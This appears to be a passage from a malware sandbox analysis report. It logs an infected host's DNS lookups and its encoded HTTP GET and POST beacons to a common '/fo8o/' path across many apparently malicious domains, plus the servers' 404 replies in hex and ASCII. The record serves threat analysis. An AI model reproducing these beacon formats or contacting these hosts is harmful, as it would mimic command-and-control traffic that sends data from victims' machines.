Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThujZncl+tVTqRpQa58ob5uovzcVfw==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 197Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 4f 56 46 50 42 74 70 70 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 50 36 35 52 31 36 77 70 59 45 4b 41 6c 70 46 79 32 6b 5a 6e 4b 34 78 55 42 50 Data Ascii: OVFPBtpp=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2P65R16wpYEKAlpFy2kZnK4xUBP

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 08:06:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 08:06:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:09 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:12 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:15 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:17 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:07:55 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-26T08:08:00.3240832Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:07:58 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-04-26T08:08:00.3240832Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:08:00 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-26T08:08:05.9520127Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:08:03 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-26T08:08:08.6951174Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:32 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:34 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:37 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:40 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 